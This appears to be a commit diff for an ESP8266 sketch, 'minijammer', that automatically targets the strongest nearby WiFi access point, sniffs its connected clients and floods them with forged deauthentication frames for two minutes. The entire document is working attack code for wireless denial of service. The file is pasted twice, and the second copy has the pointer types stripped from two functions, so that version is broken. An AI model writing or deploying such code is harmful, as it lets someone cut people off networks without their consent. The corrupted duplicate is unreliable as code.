maesoser · September 23, 2020 18:12
diff --git a/minijammer.ino b/minijammer.ino
 #include "ESP8266WiFi.h"

 extern "C" {
  #include "user_interface.h"
 }

 #define BOARD_LED 16
 #define LED_BUILTIN 2
 #define MAX_SCANS 2
 #define BLINK_TIME_MS 40
 #define BLINK_PERIOD_MS 5000
 #define CLIENT_SCAN_TIME_MS 20000
 #define ATTACK_TIME_MS 120000
 #define MAX_CLIENTS 64
 #define DEAUTH_PACKET_SIZE 26
 #define MAC_ADDR_SIZE 6

 uint8_t bcast[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};

 struct TargetAP{
  uint8_t bssid[MAC_ADDR_SIZE] ;
  int     chan ;      
  int     rssi ;  
  String  ssid ;
 } ;

 struct TargetClient{
  uint8_t  bssid[MAC_ADDR_SIZE] ;
  uint32_t pkts ;
 } ;

 struct DeauthFrame{
  uint8_t  type;
  uint8_t  subtype;
  uint16_t duration;
  uint8_t  dst[MAC_ADDR_SIZE];
  uint8_t  src[MAC_ADDR_SIZE];
  uint8_t  bssid[MAC_ADDR_SIZE];
  uint8_t  fragment;
  uint8_t  sec_num;
  uint16_t reason;
 } ;

 TargetAP ap = {};
 TargetClient clients[MAX_CLIENTS];
 uint32_t n_clients = 0;
 uint32_t attack_timer;
 uint32_t led_timer;
    
 // getTargetAP tries to find the closest AP to select it as the target.
 void getTargetAP(){
  ap.rssi = -100;
  ap.chan = -1;
  for (int j = 0; j < MAX_SCANS; j++){
    Serial.printf("[%d / %d] Scan start ... ", j+1, MAX_SCANS);
    int n = WiFi.scanNetworks(false, true);
    Serial.printf("%d network(s) found\n", n);
    for (int i = 0; i < n; i++){
      if (WiFi.RSSI(i) > ap.rssi){
        ap.ssid = WiFi.SSID(i);
        uint8_t *mac = WiFi.BSSID(i);
        memcpy(ap.bssid, mac, MAC_ADDR_SIZE);
        ap.rssi = WiFi.RSSI(i);
        ap.chan = WiFi.channel(i);
      }
    }
  }
  Serial.printf("Target is %s (%ddBm) %x:%x:%x:%x:%x:%x\n", ap.ssid.c_str(), ap.rssi, ap.bssid[0],ap.bssid[1],ap.bssid[2],ap.bssid[3],ap.bssid[4],ap.bssid[5]);
 }

 bool macCompare(uint8_t *a, uint8_t *b){
  if (memcmp ( a, b, MAC_ADDR_SIZE ) == 0) return true;
  return false;
 }

 int getClientIndex(uint8_t *a){
  for (int i = 0; i <= n_clients; i++){
    if (macCompare(clients[i].bssid, a)) return i;
  }
  return -1;
 }

 /*
 * packetSniffer captures wifi frames, compares them with the targetAP and if it belongs to it, then it creates a new
 * client struct and stores the number of packets and the MAC addr.
 */
 void packetSniffer(uint8_t *buf, uint16_t len) {
  uint8_t src[6] ;
  uint8_t dst[6] ;
  if (len > 27) {
    memcpy(src, &buf[16], MAC_ADDR_SIZE);
    memcpy(dst, &buf[22], MAC_ADDR_SIZE);
    if ( macCompare(src, ap.bssid) && !macCompare(dst, bcast)) {
      int index = getClientIndex(dst);
      if (index == -1){
        if (n_clients > MAX_CLIENTS) n_clients = MAX_CLIENTS;
        memcpy(clients[n_clients].bssid, dst, MAC_ADDR_SIZE);
        clients[n_clients].pkts ++;
        n_clients ++;
      }else{
        clients[index].pkts++;
      }
    }
  }
 }

 void getClients(uint8_t *bssid, int chan, uint32_t scanTime){
  Serial.printf("Looking for connected clients on channel %d\n", chan);
  wifi_promiscuous_enable(0);
  WiFi.disconnect();
  wifi_set_opmode(STATION_MODE);
  wifi_set_channel(chan);
  wifi_promiscuous_enable(1);
  wifi_set_promiscuous_rx_cb(packetSniffer);
  blinkSleep(scanTime);
  wifi_promiscuous_enable(0);
  Serial.printf("Found %d clients scan after %d ms\n", n_clients, scanTime);
  for (int i = 0; i < n_clients; i++) {
    Serial.printf("%d: %d pkts from  %x:%x:%x:%x:%x:%x\n", i, clients[i].pkts, clients[i].bssid[0], clients[i].bssid[1], clients[i].bssid[2], clients[i].bssid[3], clients[i].bssid[4], clients[i].bssid[5]);
  }
 }

 void sendDeauth( uint8_t *src, uint8_t *dst){
  DeauthFrame dpkt = {};
  dpkt.type = 0xC0;
  dpkt.subtype = 0x00;
  dpkt.reason = 0x0100;
  memcpy(dpkt.dst, dst, MAC_ADDR_SIZE);
  memcpy(dpkt.src, src, MAC_ADDR_SIZE);
  memcpy(dpkt.bssid, src, MAC_ADDR_SIZE);
  wifi_send_pkt_freedom((uint8_t *)&dpkt, DEAUTH_PACKET_SIZE, 0);
  delay(1);
 }

 void blink(uint32_t t, int led){
    digitalWrite(led, false);
    delay(t);
    digitalWrite(led, true);
 }

 void blinkSleep(uint32_t t){
  uint32_t timer = millis();
  do {
    blink(BLINK_TIME_MS, LED_BUILTIN);
    delay(3*BLINK_TIME_MS);
  } while( (millis() - timer) < t);
 }

 void setup(){
  pinMode(BOARD_LED, OUTPUT);
  pinMode(LED_BUILTIN, OUTPUT);
  digitalWrite(BOARD_LED, true);
  digitalWrite(LED_BUILTIN, true);
  Serial.begin(115200);
 }

 void loop(){
  digitalWrite(LED_BUILTIN, false);
  do {
    do {
      getTargetAP(); 
      delay(5);
    } while (ap.chan ==-1);
    getClients(ap.bssid, ap.chan, CLIENT_SCAN_TIME_MS);
  } while (n_clients == 0);

  Serial.printf("Attacking for %d ms\n", ATTACK_TIME_MS);
  attack_timer = millis();
  led_timer = millis();
  while( (millis() - attack_timer) < ATTACK_TIME_MS ){
    if ((millis() - led_timer) > BLINK_PERIOD_MS){
       led_timer = millis();
       blink(BLINK_TIME_MS, BOARD_LED);
    }
    for (int i = 0; i < n_clients; i++) {
      sendDeauth(ap.bssid, clients[i].bssid);
    }
  }
 }
	#include "ESP8266WiFi.h"

	extern "C" {
	#include "user_interface.h"
	}

	#define BOARD_LED 16
	#define LED_BUILTIN 2
	#define MAX_SCANS 2
	#define BLINK_TIME_MS 40
	#define BLINK_PERIOD_MS 5000
	#define CLIENT_SCAN_TIME_MS 20000
	#define ATTACK_TIME_MS 120000
	#define MAX_CLIENTS 64
	#define DEAUTH_PACKET_SIZE 26
	#define MAC_ADDR_SIZE 6

	uint8_t bcast[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};

	struct TargetAP{
	uint8_t bssid[MAC_ADDR_SIZE] ;
	int chan ;
	int rssi ;
	String ssid ;
	} ;

	struct TargetClient{
	uint8_t bssid[MAC_ADDR_SIZE] ;
	uint32_t pkts ;
	} ;

	struct DeauthFrame{
	uint8_t type;
	uint8_t subtype;
	uint16_t duration;
	uint8_t dst[MAC_ADDR_SIZE];
	uint8_t src[MAC_ADDR_SIZE];
	uint8_t bssid[MAC_ADDR_SIZE];
	uint8_t fragment;
	uint8_t sec_num;
	uint16_t reason;
	} ;

	TargetAP ap = {};
	TargetClient clients[MAX_CLIENTS];
	uint32_t n_clients = 0;
	uint32_t attack_timer;
	uint32_t led_timer;

	// getTargetAP tries to find the closest AP to select it as the target.
	void getTargetAP(){
	ap.rssi = -100;
	ap.chan = -1;
	for (int j = 0; j < MAX_SCANS; j++){
	Serial.printf("[%d / %d] Scan start ... ", j+1, MAX_SCANS);
	int n = WiFi.scanNetworks(false, true);
	Serial.printf("%d network(s) found\n", n);
	for (int i = 0; i < n; i++){
	if (WiFi.RSSI(i) > ap.rssi){
	ap.ssid = WiFi.SSID(i);
	uint8_t *mac = WiFi.BSSID(i);
	memcpy(ap.bssid, mac, MAC_ADDR_SIZE);
	ap.rssi = WiFi.RSSI(i);
	ap.chan = WiFi.channel(i);
	}
	}
	}
	Serial.printf("Target is %s (%ddBm) %x:%x:%x:%x:%x:%x\n", ap.ssid.c_str(), ap.rssi, ap.bssid[0],ap.bssid[1],ap.bssid[2],ap.bssid[3],ap.bssid[4],ap.bssid[5]);
	}

	bool macCompare(uint8_t a, uint8_t b){
	if (memcmp ( a, b, MAC_ADDR_SIZE ) == 0) return true;
	return false;
	}

	int getClientIndex(uint8_t *a){
	for (int i = 0; i <= n_clients; i++){
	if (macCompare(clients[i].bssid, a)) return i;
	}
	return -1;
	}

	/*
	* packetSniffer captures wifi frames, compares them with the targetAP and if it belongs to it, then it creates a new
	* client struct and stores the number of packets and the MAC addr.
	*/
	void packetSniffer(uint8_t *buf, uint16_t len) {
	uint8_t src[6] ;
	uint8_t dst[6] ;
	if (len > 27) {
	memcpy(src, &buf[16], MAC_ADDR_SIZE);
	memcpy(dst, &buf[22], MAC_ADDR_SIZE);
	if ( macCompare(src, ap.bssid) && !macCompare(dst, bcast)) {
	int index = getClientIndex(dst);
	if (index == -1){
	if (n_clients > MAX_CLIENTS) n_clients = MAX_CLIENTS;
	memcpy(clients[n_clients].bssid, dst, MAC_ADDR_SIZE);
	clients[n_clients].pkts ++;
	n_clients ++;
	}else{
	clients[index].pkts++;
	}
	}
	}
	}

	void getClients(uint8_t *bssid, int chan, uint32_t scanTime){
	Serial.printf("Looking for connected clients on channel %d\n", chan);
	wifi_promiscuous_enable(0);
	WiFi.disconnect();
	wifi_set_opmode(STATION_MODE);
	wifi_set_channel(chan);
	wifi_promiscuous_enable(1);
	wifi_set_promiscuous_rx_cb(packetSniffer);
	blinkSleep(scanTime);
	wifi_promiscuous_enable(0);
	Serial.printf("Found %d clients scan after %d ms\n", n_clients, scanTime);
	for (int i = 0; i < n_clients; i++) {
	Serial.printf("%d: %d pkts from %x:%x:%x:%x:%x:%x\n", i, clients[i].pkts, clients[i].bssid[0], clients[i].bssid[1], clients[i].bssid[2], clients[i].bssid[3], clients[i].bssid[4], clients[i].bssid[5]);
	}
	}

	void sendDeauth( uint8_t src, uint8_t dst){
	DeauthFrame dpkt = {};
	dpkt.type = 0xC0;
	dpkt.subtype = 0x00;
	dpkt.reason = 0x0100;
	memcpy(dpkt.dst, dst, MAC_ADDR_SIZE);
	memcpy(dpkt.src, src, MAC_ADDR_SIZE);
	memcpy(dpkt.bssid, src, MAC_ADDR_SIZE);
	wifi_send_pkt_freedom((uint8_t *)&dpkt, DEAUTH_PACKET_SIZE, 0);
	delay(1);
	}

	void blink(uint32_t t, int led){
	digitalWrite(led, false);
	delay(t);
	digitalWrite(led, true);
	}

	void blinkSleep(uint32_t t){
	uint32_t timer = millis();
	do {
	blink(BLINK_TIME_MS, LED_BUILTIN);
	delay(3*BLINK_TIME_MS);
	} while( (millis() - timer) < t);
	}

	void setup(){
	pinMode(BOARD_LED, OUTPUT);
	pinMode(LED_BUILTIN, OUTPUT);
	digitalWrite(BOARD_LED, true);
	digitalWrite(LED_BUILTIN, true);
	Serial.begin(115200);
	}

	void loop(){
	digitalWrite(LED_BUILTIN, false);
	do {
	do {
	getTargetAP();
	delay(5);
	} while (ap.chan ==-1);
	getClients(ap.bssid, ap.chan, CLIENT_SCAN_TIME_MS);
	} while (n_clients == 0);

	Serial.printf("Attacking for %d ms\n", ATTACK_TIME_MS);
	attack_timer = millis();
	led_timer = millis();
	while( (millis() - attack_timer) < ATTACK_TIME_MS ){
	if ((millis() - led_timer) > BLINK_PERIOD_MS){
	led_timer = millis();
	blink(BLINK_TIME_MS, BOARD_LED);
	}
	for (int i = 0; i < n_clients; i++) {
	sendDeauth(ap.bssid, clients[i].bssid);
	}
	}
	}